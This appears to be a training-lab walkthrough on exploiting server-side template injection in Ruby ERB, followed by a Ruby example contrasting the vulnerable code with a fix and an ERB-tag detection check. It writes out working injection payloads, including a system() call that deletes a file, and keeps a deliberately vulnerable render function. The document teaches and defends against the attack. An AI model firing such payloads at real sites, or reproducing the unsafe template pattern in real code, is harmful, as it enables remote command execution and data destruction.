This lab is vulnerable to server-side template injection due to the unsafe construction of an ERB template.
To solve the lab, review the ERB documentation to find out how to execute arbitrary code, then delete the morale.txt file from Carlos’s home directory.
2. Capture the request in Burp (if needed).
3. Let’s try to insert the ERB code. The syntax is below:
<%= someExpression %>
Code to Check:
<%= 5*5 %>
4. Look at the request: the URL parameter is URL-encoded, so we have to encode the ERB code as well if we are sending it from Burp.
Encoded final URL (if sending this in Burp):
https://<Your-Lab-ID>.web-security-academy.net/?message=<%25%3d+5*5+%25>
5. Or you can directly insert the code into the message parameter in the browser to check.
6. It is working, so let’s inject a payload to delete morale.txt.
7. From the Ruby documentation, discover the system() method, which can be used to execute arbitrary operating system commands.
8. Construct a payload to delete Carlos’s file as follows:
<%= system("rm /home/carlos/morale.txt") %>
9. Inject the payload into the message parameter as below:
https://YOUR-LAB-ID.web-security-academy.net/?message=<%25+system("rm+/home/carlos/morale.txt")+%25>
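As an added illustration (not part of the lab or its official solution), the Ruby snippet below reproduces the root cause the lab describes, user input spliced into the ERB template source, next to the fix, where the template is fixed and the input is only ever a bound value. It also shows a small check a defender can run on the decoded message parameter to flag ERB tags in logs or a WAF rule; the function names and sample inputs are assumptions made for this example.

```ruby
require 'erb'
require 'cgi'

# VULNERABLE (the lab's pattern): the user-controlled message is interpolated
# into the template *source*, so any <%= ... %> tag in it is compiled and
# executed by ERB, exactly like the "<%= 5*5 %>" probe used in the lab.
def render_unsafe(message)
  ERB.new("<p>#{message}</p>").result(binding)
end

# FIXED: the template is a constant written by the developer. The message is
# passed in as a value, so ERB never parses it as code, and html_escape keeps
# the "<", ">" and "&" characters from reaching the browser unescaped.
SAFE_TEMPLATE = ERB.new('<p><%= ERB::Util.html_escape(message) %></p>')

def render_safe(message)
  SAFE_TEMPLATE.result_with_hash(message: message)
end

# Detection helper: does the (already URL-decoded) input contain ERB tags?
# Run it on the decoded parameter, because an attacker will send the encoded
# form seen in the lab (e.g. "<%25%3d+5*5+%25>") rather than literal tags.
ERB_TAG = /<%[=#-]?.*?-?%>/m

def contains_erb_tags?(input)
  input.match?(ERB_TAG)
end

def decoded_param_has_erb_tags?(raw_query_value)
  contains_erb_tags?(CGI.unescape(raw_query_value))
end

if __FILE__ == $PROGRAM_NAME
  probe = '<%= 5*5 %>'                    # constructed sample input
  puts "unsafe: #{render_unsafe(probe)}"  # the expression is evaluated
  puts "safe:   #{render_safe(probe)}"    # the tag is rendered as text
  puts "flag:   #{decoded_param_has_erb_tags?('<%25%3d+5*5+%25>')}"
end
```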